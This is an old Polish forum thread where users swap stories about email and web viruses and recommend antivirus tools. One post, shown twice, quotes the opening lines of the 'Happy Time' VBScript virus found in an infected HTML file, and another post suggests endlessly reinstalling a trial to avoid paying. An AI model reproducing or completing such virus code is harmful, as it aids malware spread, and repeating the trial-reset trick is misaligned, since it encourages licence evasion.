Wirusy....

[Gość: Mosze]

Dzis dostalem duzo wirusow, ale jak widzicie jestem jeszcze na "Mapie"
chce tylko przypomniec, ze kto ich wysyla to grozi kara wiezienia co najmniej...

[Gość: jajacek]

A to pij ziola!
Jak dostales te wirusy?
Radze wejsc na strone www.poland.com,tam w serwisie"download"chyba w
dziale "dodatki"jest malutki programik "ProPort"zciagnij go sobie .
Zawsze bedziesz wiedzial czy masz nieproszonych gosci w komputerze!

[Gość: Stoik]

Drogi Mosze,
to jakaś epidemia, dziś doszło do mnie 15 listów z wirusami. Ale nie myśl
sobie, że tyle jest złośliwych ludzi na świecie. Jak otworzysz załącznik z
takim wirusem, to on zaraz rozsyła listy z sobą samym do wszystkich, którzy są
w Twojej książce adresowej!
Polecam jakiś dobry program antywirusowy, np. Norton Antyvirus, który sprawdza
listy w trakcie ich przychodzenia.
Serdecznie pozdrawiam i życzę szybkiego ozdrowienia (komputera).

[Gość: Mosze]

Dziekuje, ja nie otwozylem, kilka bylo pisane po "Chinsku" ale wedlug adresu to
wiem skad one przychodza...

[Gość: Scan]

Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na
wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka
wygna.
I darmo.
Pozdrawiam
Scan

[Gość: SCAN]

Poprawka, Mosze: mks.com.pl. versja traialowa 30 dni. Ale po 30 dniach zainstaluj
od nowa i tak na okrąglo. Koniecznie zachowaj instalke. Nie ujrzy Marek Sell ani
szekla!!!!
Pozdrawiam
Scan
Gość portalu: Scan napisał(a):

> Mosze drogi, Norton antyvirus dobry na zachodnie wirusy, a one lagodne. Na
> wszelka france najlepszy polski mks.vir. - www.mksvir.com. Nie kijem, to palka
> wygna.
> I darmo.
> Pozdrawiam
> Scan

Czy widze dobrze...??

[Gość: Mosze]

Panie Scan ta godzina to prawdziwa...
U nas sie mowi nie pyta sie mezczyzny co robi po nocy .... ale ??
Pzdr,
Mosze

[Gość: scan]

Mosze, ja czuwam. Dniami i nocami.Zebys mogl spac spokojnie.
Pozdrowienia
Scan

[Gość: maurycy]

Drogi Mosze,

Niewiele można zrobić, poza wyrzuceniem zawirusowanego postu.
Często wysyłający posty, nie wiedzą, że wysyłają wirusy typu robak.
Co do porogramów antywirusowych, to polecam stronę:

http://www.wirusy.pl/wirusy.php/index0.php

na której masz do wyboru kilka programów antywirusowych, z których polecam
AVP Eugene Kasperky Pro. Jest on wiele lepszy od McAfee, czy też Norton
Ativirus.

Pozdrowienia,

Maurycy

[sceptyk]

Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu -
NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha,
albo ze masz szanse wygrac 1 000 000.

pzdr
sc-k

[Gość: Hiacynt]

sceptyk napisał(a):

> Zasada numer 1 emailu: jesli dostajesz list z attachment z nieznanego adresu -
> NIE OTWIERASZ! Prosto do smieci. Chocby nawet w tytule bylo, ze ktos Cie kocha,
>
> albo ze masz szanse wygrac 1 000 000.
>
> pzdr
> sc-k

A co zrobić jak w tytule stoi: Nie otworzysz to umrzesz. ???
Pozdrawiam wszystkich wirusologów

Uwaga na strony HTML

[Gość: Lechu]

Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''a i mks go
wykrywał. Ten wirus był wredny: zarażał moje html''e, exe''ki i dll''e. Po czym
kasował pliki. W html''u to był kawałek programu (znakowo-VBscript). Problem w
tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
akcje wyłapuje program antywirusowy.

HTML ???

[Gość: Indris]

Gość portalu: Lechu napisał(a):

> Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
> jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go
>
> wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym
>
> kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w
> tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
> javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
> niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
> akcje wyłapuje program antywirusowy.

Proponuję Ci, żebyś przesłał tę informację do producenta VBscriptu, może CI nawet coś odpalą, a oprócz
tego pokazał ten kawałek kodu. Jeszcze bardziej dotyczy to Javy. Producent Javy już jakiś czas temu
zwracał się do wszystkich użytkowników z prośbą o łamanie zabezpieczeń i powiadamianie jak się uda.
Nie znam VBscriptu, ale domyślam się, że ma wpisany zakaz odnoszenia się do plików na komputerze
klienta, Java ma to na pewno. Gdyby wstawki VBs mogły robić takie rzeczy jak piszesz, to chyba już by było
o tym głośno ? Ale może to jakiś wirusowy geniusz wpadł na to o czym nikt wcześniej nie pomyślał ?
Albo więc jest to jakaś Twoja pomyłka albo bomba sezonu. Podaj szczegóły !
Od niedzieli będę na urlopie przez ok miesiąca ale z dużym zaciekawieniem przeczytam po powrocie.

Oto początek kodu virusa z HTML (happy time)

[Gość: Lechu]

Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod
został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script
nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi.
Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na
szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb
zegarowych może długi czas zostać niewykryte, aż do czasu zero.


Początek kodu:

<script language=''VBScript''>
Rem I am sorry! happy time
On Error Resume Next
mload
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Os.Write()

Oto początek kodu virusa z HTML (happy time)

[Gość: Lechu]

Pierwsza reakcja mks-a była na pliku tymczasowym help.htm. Cały poniższy kod
został dołączony na końcu, za znacznikiem </html>. Niewykluczone że sam script
nie odnosi się do plików, lecz ściąga jakiś inny plik, który to robi.
Takie zdarzenie miałem po raz pierwszy od kilku lat surfowania. Sądzę więc (na
szczęście), że nie jest to powszechny sposób infekowania. Ale umieszczanie bomb
zegarowych może długi czas zostać niewykryte, aż do czasu zero.


Początek kodu:

<script language=''VBScript''>
Rem I am sorry! happy time
On Error Resume Next
mload
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\Help.htm"
Os.Doc = Lhtml()
Os.Write()

[Gość: pollak]

Gość portalu: Lechu napisał(a):

> Ostatnio złapałem wirusa tylko oglądając strony HTML w internecie. Nie miałem
> jeszcze żadnego scana (sorry, SCAN). Ale później zainstalowałem mks''''a i mks go
>
> wykrywał. Ten wirus był wredny: zarażał moje html''''e, exe''''ki i dll''''e. Po czym
>
> kasował pliki. W html''''u to był kawałek programu (znakowo-VBscript). Problem w
> tym, że strony html standardowo zawierają programy (procedury) w VBscripcie,
> javie, itp., które są potrzebne do prezentacji strony, np. animacje. Ale
> niektóre z tych procedur (wirusy) chcą coś zmienić w innych plikach. Wtedy te
> akcje wyłapuje program antywirusowy.

exe-ki, dll-e ... panowie rzucmy te Windowsy, bo sie rozchorujemy.

Podziękowanie i jedna uwaga

[Gość: Indris]

Dziękuję za kod, jeszcze go zdążyłem odczytać. Mam jedno spostrzeżenie: VBscript jest akceptowany
przez Internet Explorera, ale ignorowany przez Netscape (przynajmniej do wersji 4.75). O innych
przeglądarkach nie wiem nic ''w tym temacie''. Dlatego m/in nie zapoznałem się dotąd z VBscriptem,
bo staram się tworzyć strony akceptowane przez obie przeglądarki. Wynikałoby z tego, że Netscape
jest przeglądarką bezpieczniejszą, bo jedyne aktywne wstawki przy NS to wstawki JavaScript i aplety
Javy.
Wirusa w JavaScript sobie nie wyobrażam (ale może to niedostatek wyobraźni). O wirusie w Javie, też
nie słyszałem, ale widziałem przykład apletu zatykającego komputer. Idea była prosta: aplet tworzył
nowy wątek, który tworzył nowy wątek, który... To się nie replikowało, więc nie było klasycznym
wirusem, ale wnerwiać potrafiło.

[Gość: M.]

Zalaczniki

[Gość: M.]

Wirusy, jak dobre potrafia nas zaskoczyc. Ja mialam mialam malo zabawna
historie. Dostalam mail od bardzo szacownego pana na wysokim stanowisku, z
ktorym prowadzilam sluzbowa korespondencje: tytul byl: I love you. Pomyslalam,
ze oszalal albo, ze ja wyslalam mu cos niewlasciwego przez pomylke, albo czyms
mu sie przysluzylam. Bylam pierwsza w biurze. Po chwili przyszli koledzy i
zaczeli tez mi odsylac milosne zwierzenia. A dobrze juz wtedy wiedzialam, ze
nieznanych zalacznikow otwierac nie mozna. ZAnim wyjasniono, ze to
ogolnoswiatowa zaraza, administrator doszedl, ze to ja pierwsza rozsylac je po
firmie zaczelam - a firma w calej Europie - i bardzo sie cieszyl palcem na mnie
wskazujac. Pamietacie tego wirusa, prawda?

[Gość: Venom]

Moral jest taki: nigdy nie przychodz jako pierwsza do
pracy A poza tym wspolczuje. Ten wirus wywolal
histerie i zaliczenie w poczet jego rozmnazaczy nie
moglo byc przyjemne.

[Gość: maurycy]

Ja dostałem I Love You od bardzo miłej pani z którą wspołpracuję od lat.

))

Wirusy?....instalujcie wigwamy!!!!!!!!

[Gość: francek]

Pan Pollak ma racje!!!
w tym miejscu powiedziec moge tylko:
"Linux is like a wigwam: no windows, no gates, apache inside !"

[Gość: witek]

Przepraszam, że się odzywam bo niczego istotnego nie umiem dodać.Nie mogę się
jednak oprzeć pokusie żeby się nie odezwać.
Czytam Was na bieżąco i co raz bardziej mam otwarte usta z podziwu z jakimi to
ja kompetentnymi ludżmi wirtualnie obcuję.
Oczywiście wszystko sobie zanotowałem.
Dziękuję, pozdrawiam Mosze i naszych przyjaznych EKSPERTÓW
Witek

[Gość: jajacek]

Dziki,ze napisales link do tego programu .
Do godz.17 korzystalem z PC Cillin2000 powodowal cigle konflikty przy starcie
systemu.
Wgralem ten polski program i przetestowalem go ,wpuscilem mu kontrolnie trzy
wirusy.
Rozpoznal je bezblednie!
Cudze chwalicie swojego nie znacie!!!!!!!!!!!!!!!!!
PS.
Przy wszystkich zaletach zajmoje tylko 3.8MB!!!!!!!!!!

[Gość: Jajacek]

Kawalek z ciasta ,ktore jadlem przy pisaniu poprzedniego postu blokowal
skutecznie klawisz z literka "E" co zobaczylem za pozno.))))

[Gość: Tytus]

Mam taki zwyczaj : jak od kogos nie chce dostawac wiecej postow to wysylam E-
post z emnne : I love you . Oczywiscie wysylam post bez wirusa bo takiego nie
posiadam i jeszcze podobnego problemu nie mialem . W kazdym razie namierzony
klijent jest z glowy .

Polecam sprawdzone !
Tytus